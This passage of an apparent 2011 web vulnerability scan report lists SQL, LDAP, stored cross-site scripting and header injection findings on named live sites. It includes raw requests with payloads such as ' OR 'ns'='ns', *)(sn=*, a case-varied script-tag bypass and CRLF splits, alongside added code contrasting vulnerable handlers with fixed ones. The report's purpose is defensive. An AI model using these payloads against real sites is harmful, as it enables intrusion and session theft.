Request 2

GET /tools/markers_sema.php?sema='+OR+'ns'%3d'ns'' HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1

Response 2

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:14:02 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 65
Content-Type: text/xml

<?xml version="1.0" encoding="ISO-8859-1"?>
<markers>
</markers>
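The request pair above is the standard single-quote / double-quote differential: one quote leaves the string literal unterminated, two quotes become one escaped quote inside the literal and the statement parses again. The following is an added example, not code from the report or from vcahospitals.com, that reproduces the heuristic against an in-memory SQLite table. The table, its rows and its other columns are constructed for the example; only sema, i_emergency_only and distance are taken from the leaked error message. The parameterised version is shown beside it so the same test can be run against the fix.

```python
import sqlite3

# Payloads exactly as submitted in Request 1 and Request 2 above (URL-decoded).
PAYLOAD_ONE_QUOTE = "' OR 'ns'='ns'"
PAYLOAD_TWO_QUOTES = "' OR 'ns'='ns''"


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the markers table (rows are made up)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE hospitals (name TEXT, sema TEXT, i_emergency_only INTEGER, distance REAL)"
    )
    conn.executemany(
        "INSERT INTO hospitals VALUES (?, ?, ?, ?)",
        [
            ("VCA North", "ns", 0, 1.5),
            ("VCA East", "ew", 0, 3.0),
            ("VCA 24h", "ns", 1, 0.5),
        ],
    )
    return conn


def query_unsafe(conn, sema):
    """String-built query of the shape the error message reveals."""
    sql = (
        "SELECT name FROM hospitals WHERE sema = '" + sema
        + "' AND i_emergency_only <> 1 ORDER BY distance"
    )
    try:
        return "ok", [row[0] for row in conn.execute(sql)]
    except sqlite3.OperationalError as exc:
        # The DB's own syntax error; a careless handler echoes this to the client.
        return "error", str(exc)


def query_safe(conn, sema):
    """Same query with a bound parameter: the value can never become syntax."""
    sql = "SELECT name FROM hospitals WHERE sema = ? AND i_emergency_only <> 1 ORDER BY distance"
    return "ok", [row[0] for row in conn.execute(sql, (sema,))]


def quote_differential(run, conn) -> bool:
    """The scanner's test: one quote breaks the statement, two quotes repair
    it. True means the endpoint looks injectable."""
    one, _ = run(conn, PAYLOAD_ONE_QUOTE)
    two, _ = run(conn, PAYLOAD_TWO_QUOTES)
    return one == "error" and two == "ok"


if __name__ == "__main__":
    db = make_db()
    print("legitimate:", query_unsafe(db, "ns"))
    print("one quote: ", query_unsafe(db, PAYLOAD_ONE_QUOTE))
    print("two quotes:", query_unsafe(db, PAYLOAD_TWO_QUOTES))
    print("injectable (unsafe):", quote_differential(query_unsafe, db))
    print("injectable (safe):  ", quote_differential(query_safe, db))
```

Against query_unsafe the two-quote request returns an empty result set with no error, which is exactly the empty <markers/> document in Response 2; against query_safe both payloads are simply values that match no row.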

2. LDAP injection

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.hbccards.com
Path:   /ordernow.asp

Issue detail

The X-Mapping-ofcbhgem cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the X-Mapping-ofcbhgem cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.
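The filter code below is an added illustration, not code from the report or from hbccards.com: the attribute name sessionKey, the objectClass value and the idea that the X-Mapping cookie is looked up by an LDAP search are all assumptions made for the example. It shows why the two payloads from the issue detail produce different responses when a value is pasted into a conjunctive filter (the first adds a well-formed extra clause, the second leaves a bare "!" that no filter grammar accepts), and implements both the RFC 4515 value escaping and the short allow-list that the remediation text asks for.

```python
import re

# RFC 4515 section 3: characters that must be hex-escaped inside an
# assertion value so they cannot change the structure of the filter.
_LDAP_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}


def escape_filter_value(value: str) -> str:
    """Escape one assertion value for safe inclusion in an LDAP search filter."""
    return "".join(_LDAP_ESCAPES.get(ch, ch) for ch in value)


def build_filter_unsafe(mapping_cookie: str) -> str:
    # Assumed lookup (not the site's real code): the cookie value is pasted
    # verbatim into a conjunctive (&...) filter.
    return f"(&(sessionKey={mapping_cookie})(objectClass=webSession))"


def build_filter_escaped(mapping_cookie: str) -> str:
    return f"(&(sessionKey={escape_filter_value(mapping_cookie)})(objectClass=webSession))"


def accept_cookie(value: str) -> bool:
    """Allow-list from the remediation text: the cookie legitimately carries a
    32-digit upper-case hex token (see the Set-Cookie values in the responses)."""
    return re.fullmatch(r"[0-9A-F]{32}", value) is not None


def is_well_formed(filter_str: str) -> bool:
    """Simplified RFC 4515 grammar: filter = '(' ( '&' 1*filter | '|' 1*filter
    | '!' filter | attr op value ) ')'. Extensible-match syntax is omitted."""
    item = re.compile(r"[A-Za-z][A-Za-z0-9.;-]*(?:~=|>=|<=|=)[^()]*")
    pos = 0

    def parse() -> bool:
        nonlocal pos
        if pos >= len(filter_str) or filter_str[pos] != "(":
            return False
        pos += 1
        if pos >= len(filter_str):
            return False
        c = filter_str[pos]
        if c in "&|":
            pos += 1
            n = 0
            while pos < len(filter_str) and filter_str[pos] == "(":
                if not parse():
                    return False
                n += 1
            if n == 0:
                return False
        elif c == "!":
            pos += 1
            if not parse():
                return False
        else:
            m = item.match(filter_str, pos)
            if not m:
                return False
            pos = m.end()
        if pos >= len(filter_str) or filter_str[pos] != ")":
            return False
        pos += 1
        return True

    return parse() and pos == len(filter_str)


def clause_count(filter_str: str) -> int:
    """Number of attribute assertions, i.e. '(' characters that open an item."""
    return len(re.findall(r"\([A-Za-z]", filter_str))


if __name__ == "__main__":
    for payload in ("87F600579E92D94B86F73C50B28A9011", "*)(sn=*", "*)!(sn=*"):
        f = build_filter_unsafe(payload)
        print(f"{payload!r:36} allowed={accept_cookie(payload)!s:5} "
              f"well-formed={is_well_formed(f)!s:5} clauses={clause_count(f)}  {f}")
```

The unescaped "*)(sn=*" turns a two-clause filter into a three-clause one that the directory happily evaluates, while "*)!(sn=*" is rejected by the directory as malformed; that parse-versus-error difference is what the scanner observed. After escaping, both payloads stay inside one assertion value and the clause count does not change, and the allow-list rejects them before any filter is built.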

Request 1

GET /ordernow.asp HTTP/1.1
Host: www.hbccards.com
Proxy-Connection: keep-alive
Referer: http://www.hbccards.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQASQRRDR=KMHDLKEBEFFFDGLAGGIHOIMA; X-Mapping-ofcbhgem=*)(sn=*; __utmz=143952236.1301493176.1.1.utmcsr=www2.hbc.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/index.shtml; __utma=143952236.1494936254.1301493176.1301493176.1301493176.1; __utmc=143952236; __utmb=143952236.1.10.1301493176

Response 1

HTTP/1.1 200 OK
Date: Wed, 30 Mar 2011 13:54:29 GMT
Server: Microsoft-IIS/7.0
Vary: Accept-Encoding
Cache-Control: private
Content-Type: text/html; charset=UTF-8
X-Powered-By: ASP.NET
Content-Length: 26877
Set-Cookie: ASPSESSIONIDASCQDSAS=EPKLECJBDJONHADGAAFPJNJJ; path=/
Set-Cookie: X-Mapping-ofcbhgem=87F600579E92D94B86F73C50B28A9011; path=/



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="verify-v1" content="GRCE6xM3xZdXlLcKcRFjxCaVnk0e2bEm68tZ64H5LQE=" >
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<title>Order Hbc Corporate Gift Cards </title>

<!-- IE6 Fix Attempt -->

<!--[if IE 6]>
<style>
.menu {display:block; width:990px !important; }
#left_side{margin-top:0px !important; }
#inside_right{margin-top:0px !important; width:590px !important; float:right !important; clear:none !important; z-index:1 !important;}
#maincontainer{z-index:0 !important; }


input {width:250px !important;}
.createprofile_line {width:590px !important; float:left !important; clear:both !important; }
.createprofile_formside {width:260px !important; float:left !important; clear:none !important; }
.checkbox{width:15px !important; }
form #aform select{width: 250px !important; }

</style>
<![endif]-->

<!--[if IE]>
<style>
#navigation_minor_1 {padding-top:3px !important; padding-bottom:3px !important;}
#navigation_minor_2{padding-top:3px !important; padding-bottom:3px !important;}
</style>
<![endif]-->

<!--[if gt IE 7]>
<style>
#navigation_minor_1 {padding-top:6px !important; }
#navigation_minor_2{padding-top:6px !important; }
</style>
<![endif]-->


<link rel="stylesheet" href="css/hbc.css" type="text/css" />
<link rel="stylesheet" href="css/sifr.css" type="text/css" />

<script src="js/sifr.js" type="text/javascript"></script>
<script src="js/sifr-config.js" type="text/javascript"></script>

<!-- form validators -->

<link href="css/lytebox.css" rel="stylesheet" type="text/css" />
<SCRIPT TYPE="text/javascript" src=formval.js></SCRIPT>
<sc
...[SNIP]...

Request 2

GET /ordernow.asp HTTP/1.1
Host: www.hbccards.com
Proxy-Connection: keep-alive
Referer: http://www.hbccards.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQASQRRDR=KMHDLKEBEFFFDGLAGGIHOIMA; X-Mapping-ofcbhgem=*)!(sn=*; __utmz=143952236.1301493176.1.1.utmcsr=www2.hbc.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/index.shtml; __utma=143952236.1494936254.1301493176.1301493176.1301493176.1; __utmc=143952236; __utmb=143952236.1.10.1301493176

Response 2

HTTP/1.1 200 OK
Date: Wed, 30 Mar 2011 13:54:32 GMT
Server: Microsoft-IIS/7.0
Vary: Accept-Encoding
Cache-Control: private
Content-Type: text/html; charset=UTF-8
X-Powered-By: ASP.NET
Content-Length: 26877
Set-Cookie: X-Mapping-ofcbhgem=8D3F5C4CE3306DE23752A8D1F5AEFD98; path=/



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="verify-v1" content="GRCE6xM3xZdXlLcKcRFjxCaVnk0e2bEm68tZ64H5LQE=" >
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<title>Order Hbc Corporate Gift Cards </title>

<!-- IE6 Fix Attempt -->

<!--[if IE 6]>
<style>
.menu {display:block; width:990px !important; }
#left_side{margin-top:0px !important; }
#inside_right{margin-top:0px !important; width:590px !important; float:right !important; clear:none !important; z-index:1 !important;}
#maincontainer{z-index:0 !important; }


input {width:250px !important;}
.createprofile_line {width:590px !important; float:left !important; clear:both !important; }
.createprofile_formside {width:260px !important; float:left !important; clear:none !important; }
.checkbox{width:15px !important; }
form #aform select{width: 250px !important; }

</style>
<![endif]-->

<!--[if IE]>
<style>
#navigation_minor_1 {padding-top:3px !important; padding-bottom:3px !important;}
#navigation_minor_2{padding-top:3px !important; padding-bottom:3px !important;}
</style>
<![endif]-->

<!--[if gt IE 7]>
<style>
#navigation_minor_1 {padding-top:6px !important; }
#navigation_minor_2{padding-top:6px !important; }
</style>
<![endif]-->


<link rel="stylesheet" href="css/hbc.css" type="text/css" />
<link rel="stylesheet" href="css/sifr.css" type="text/css" />

<script src="js/sifr.js" type="text/javascript"></script>
<script src="js/sifr-config.js" type="text/javascript"></script>

<!-- form validators -->

<link href="css/lytebox.css" rel="stylesheet" type="text/css" />
<SCRIPT TYPE="text/javascript" src=formval.js></SCRIPT>
<script type="text/javascript" language="javascript" src="js/lytebox.j
...[SNIP]...

3. Cross-site scripting (stored)
There are 2 instances of this issue:

Issue background

Stored cross-site scripting vulnerabilities arise when data which originated from any tainted source is copied into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.

The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.

Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP which are ultimately rendered within a web mail application).

Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users, and they can potentially be exploited to create web application worms which spread exponentially amongst application users.

Note that automated detection of stored cross-site scripting vulnerabilities cannot reliably determine whether attacks that are persisted within the application can be accessed by any other user, only by authenticated users, or only by the attacker themselves. You should review the functionality in which the vulnerability appears to determine whether the application's behaviour can feasibly be used to compromise other application users.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.

User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://learn.shavlik.com/shavlik/index.cfm [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://learn.shavlik.com
Path:   /shavlik/index.cfm

Issue detail

The value of the h request parameter submitted to the URL /shavlik/index.cfm is copied into an HTML comment at the URL /shavlik/index.cfm. The payload 78a5a--><script>alert(1)</script>c5257cb7950 was submitted in the h parameter. This input was returned unmodified in a subsequent request for the URL /shavlik/index.cfm.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request 1

GET /shavlik/index.cfm?m=1009&pg=697&h=78a5a--><script>alert(1)</script>c5257cb7950&hp=70 HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=610666; CFTOKEN=95679479; __utmz=202100691.1300711269.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=202100691.944756920.1300711269.1300711269.1300711269.1

Request 2

GET /shavlik/index.cfm?m=1009&pg=697&h=&hp=69 HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=610666; CFTOKEN=95679479; __utmz=202100691.1300711269.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=202100691.944756920.1300711269.1300711269.1300711269.1

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 25 Mar 2011 21:02:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


                                                                       
...[SNIP]...
<!-- 78a5a--><script>alert(1)</script>c5257cb7950|697 -- -->
...[SNIP]...

3.2. http://order.1and1.com/xml/order/Home [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Home

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/Home is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Home. The payload ea665</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>c100d99cab9 was submitted in the REST URL parameter 3. This input was returned as ea665</ScRiPt ><ScRiPt>alert(1)</ScRiPt>c100d99cab9 in a subsequent request for the URL /xml/order/Home.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
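The remediation notes for 3.1 (HTML comment context) and 3.2 (JavaScript string context, case-variant blacklist bypass) are illustrated together by the added example below; it is not code from the report, from learn.shavlik.com or from order.1and1.com. The two payloads are the ones from the issue details; the templates around them and the case-sensitive blacklist are assumed models of the vulnerable pages. The standard-library HTML parser is used as a browser-like tokenizer to count how many script elements each rendering actually produces.

```python
import html
import json
from html.parser import HTMLParser

COMMENT_PAYLOAD = "78a5a--><script>alert(1)</script>c5257cb7950"      # from 3.1
JS_PAYLOAD = "ea665</ScRiPt ><ScRiPt>alert(1)</ScRiPt>c100d99cab9"   # from 3.2


# ---- 3.1: data echoed inside an HTML comment (template is assumed) ----
def render_comment_unsafe(h: str) -> str:
    return f"<html><body><!-- {h}|697 -- --></body></html>"


def render_comment_escaped(h: str) -> str:
    # Encoding '>' means the sequences '-->' and '--!>' can never appear in
    # the value, so the comment cannot be closed early.
    return f"<html><body><!-- {html.escape(h)}|697 -- --></body></html>"


# ---- 3.2: data echoed inside a double-quoted JavaScript string ----
def blacklist_filter(value: str) -> str:
    """Assumed case-sensitive blacklist of the kind 'ScRiPt' walks past."""
    return value.replace("<script", "").replace("</script", "")


def render_js_blacklist(lastpage: str) -> str:
    return f'<script>UNOUNO.params.lastpage="{blacklist_filter(lastpage)}";</script>'


def js_string_literal(value: str) -> str:
    """json.dumps handles quotes, backslashes and control characters; '<' and
    '>' are escaped as well so '</script>' can never end the script block."""
    return json.dumps(value).replace("<", "\\u003c").replace(">", "\\u003e")


def render_js_encoded(lastpage: str) -> str:
    return f"<script>UNOUNO.params.lastpage={js_string_literal(lastpage)};</script>"


# ---- browser-like check: how many <script> elements does the page contain? ----
class _ScriptCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.scripts = []       # body text of every script element seen
        self._open = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._open = True
            self.scripts.append("")

    def handle_endtag(self, tag):
        if tag == "script":
            self._open = False

    def handle_data(self, data):
        if self._open:
            self.scripts[-1] += data


def script_elements(document: str) -> list:
    p = _ScriptCollector()
    p.feed(document)
    p.close()
    return p.scripts


if __name__ == "__main__":
    print("comment, unsafe: ", script_elements(render_comment_unsafe(COMMENT_PAYLOAD)))
    print("comment, escaped:", script_elements(render_comment_escaped(COMMENT_PAYLOAD)))
    print("js, blacklist:   ", script_elements(render_js_blacklist(JS_PAYLOAD)))
    print("js, encoded:     ", script_elements(render_js_encoded(JS_PAYLOAD)))
```

In the unsafe comment rendering the parser sees the comment end at the payload's own "-->" and then a real script element; after html.escape the whole value stays inside the comment. In the script-context case the blacklist leaves the mixed-case payload untouched, so "</ScRiPt >" terminates the application's script block and a second, attacker-controlled one follows; with the \u003c/\u003e encoding the page keeps a single script element whose string value still decodes to the original text at runtime.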

Request 1

GET /xml/order/Homeea665</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>c100d99cab9;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__reuse=1301085812313 HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4f6d1cc610415400; UT=zY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDowNmZvNSgpJSUjKiYoICAgHR0=; emos1und1d1_jcsid=AAABLu7Cx_zt8xXxYBlocQB77**YqU*t:1:AAABLu7Cx_wZVGEkt*DMxXkpVLopiumS:1301085865980; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:4:AAABLu7Cx_zt8xXxYBlocQB77**YqU*t:1301085865980:0:false:10
If-None-Match: b893ed23e93e100ddf8d3139f7f81ff4

Request 2

GET /xml/order/Home;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__reuse=1301085812313 HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4f6d1cc610415400; UT=zY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDowNmZvNSgpJSUjKiYoICAgHR0=; emos1und1d1_jcsid=AAABLu7Cx_zt8xXxYBlocQB77**YqU*t:1:AAABLu7Cx_wZVGEkt*DMxXkpVLopiumS:1301085865980; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:4:AAABLu7Cx_zt8xXxYBlocQB77**YqU*t:1301085865980:0:false:10

Response 2

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 21:08:59 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=DYlcnQUI4YWFhW25kazFpYzAiLGVYUipBNC4tMS4uLSstKygoKyokJyseIB8eG0AuWmZodi4wK1s0Xm0zJicjIicjISQiHCQbMTpyczkvNWVuNCcoJCQiKSUnHx8fHBw=; Expires=Thu, 13-Apr-2079 00:23:06 GMT; Path=/
ETag: 5a3e49c368168e21af680e510fa8e1df
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 36436


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
3B2E0C115D59680FE3F90BB02.TCpfix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="Home";UNOUNO.params.lastpage="Homeea665</ScRiPt ><ScRiPt>alert(1)</ScRiPt>c100d99cab9";UNOUNO.params.articles="0"};
   //-->
...[SNIP]...

4. HTTP header injection
There are 10 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters (carriage return 0x0D and line feed 0x0A) into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 (and 0x7F) should be rejected. In the findings below the payloads arrive percent-encoded (%0d%0a) and are decoded by the server before being copied into the Location or Set-Cookie header, so validation must be applied to the decoded value, not to the raw URL.
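The following is an added example, not code from the scan report or from the scanned services. It shows a redirect handler that URL-decodes a path segment and copies it into a Location header, first as the findings below exhibit it and then with the validation the remediation calls for, and parses the resulting raw response the way a client or proxy would. The handler structure, the redirect host and the helper names are assumptions for illustration; the first payload is the one submitted in finding 4.1, the second is constructed to show a full response split.

```javascript
// Added example: CRLF injection into a Location header, vulnerable and hardened.
// Handler layout, host and helper names are assumed for illustration.

// Payload from finding 4.1, exactly as submitted in REST URL parameter 1.
const REPORT_PAYLOAD = '6c394%0d%0a997748dc239';
// Constructed payload: closes the header block and supplies an attacker body.
const SPLIT_PAYLOAD = 'x%0d%0aContent-Type:%20text/html%0d%0a%0d%0a<script>alert(1)</script>';

// Vulnerable: the decoded segment is concatenated straight into the header value.
function buildRedirectVulnerable(segment) {
  const decoded = decodeURIComponent(segment);   // "%0d%0a" becomes "\r\n"
  return 'HTTP/1.1 302 Moved Temporarily\r\n' +
         'Location: http://static.2mdn.net/' + decoded + '/huffpost.boomerangpixel/bingmodule\r\n' +
         'Content-Type: text/html\r\n' +
         '\r\n' +
         '<h1>Error 302 Moved Temporarily</h1>';
}

// Minimum check from the remediation text: no control characters, no DEL.
function hasControlChars(value) {
  return /[\x00-\x1f\x7f]/.test(value);
}

// Stricter check: a short token of allowlisted characters and nothing else.
function isSafePathSegment(value) {
  return /^[A-Za-z0-9._-]{1,64}$/.test(value);
}

// Hardened: validate the DECODED value, then copy it.
function buildRedirectHardened(segment) {
  const decoded = decodeURIComponent(segment);
  if (hasControlChars(decoded) || !isSafePathSegment(decoded)) {
    throw new Error('rejected path segment: ' + JSON.stringify(decoded));
  }
  return 'HTTP/1.1 302 Moved Temporarily\r\n' +
         'Location: http://static.2mdn.net/' + decoded + '/huffpost.boomerangpixel/bingmodule\r\n' +
         'Content-Type: text/html\r\n' +
         '\r\n' +
         '<h1>Error 302 Moved Temporarily</h1>';
}

// Split a raw response as a client or caching proxy would: status line,
// header lines up to the first empty line, then the body.
function parseResponse(raw) {
  const sep = raw.indexOf('\r\n\r\n');
  const headerLines = raw.slice(0, sep).split('\r\n');
  return { status: headerLines[0], headers: headerLines.slice(1), body: raw.slice(sep + 4) };
}

// Run stand-alone to see the header split and the injected body.
console.log(parseResponse(buildRedirectVulnerable(REPORT_PAYLOAD)).headers);
console.log(parseResponse(buildRedirectVulnerable(SPLIT_PAYLOAD)).body);
```

With the report's payload the Location value ends after "6c394" and the remainder becomes a second, malformed header line, which is what the captured responses show. With the constructed payload the injected empty line ends the header block early, so everything after it, including the attacker's markup, is delivered as the response body; the hardened builder rejects both before any header is written.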


4.1. http://ad.doubleclick.net/ad/huffpost.boomerangpixel/bingmodule [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
